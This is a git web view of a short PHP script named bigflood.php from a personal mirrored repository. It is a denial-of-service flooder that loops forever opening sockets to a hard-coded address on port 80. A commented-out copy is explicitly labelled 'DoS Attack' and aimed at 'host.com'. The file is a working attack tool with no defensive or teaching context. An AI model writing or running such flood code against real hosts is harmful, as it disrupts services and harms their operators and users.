Added lot of junk laying around on harvie.cz
[mirrors/Programs.git] / php / skripty / bigflood.php
1 <?php
2 //Bigflood
3 $host = "localhost";
4 $host = "192.168.2.161";
5 $port = 80;
6 $timeout = 0.00001;
7
8 echo("Sending ".(1/$timeout)." packets / second.\n");
9 while(1) {
10 @pfsockopen($host, $port, $errno, $err, $timeout);
11 }
12
13
14 /*
15
16 <?php
17 //DoS Attack
18 echo("Attacking...");
19 while(1) {
20 @pfsockopen(
21 "host.com", 80, $errno, $err, 0.00001);
22 }
23 ?>
24
25 */
This page took 0.274322 seconds and 4 git commands to generate.